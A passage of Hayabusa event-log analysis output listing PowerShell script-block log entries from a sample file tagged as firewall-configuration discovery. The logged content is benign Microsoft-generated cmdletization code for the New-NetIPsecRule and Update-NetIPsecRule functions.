$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 
'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value 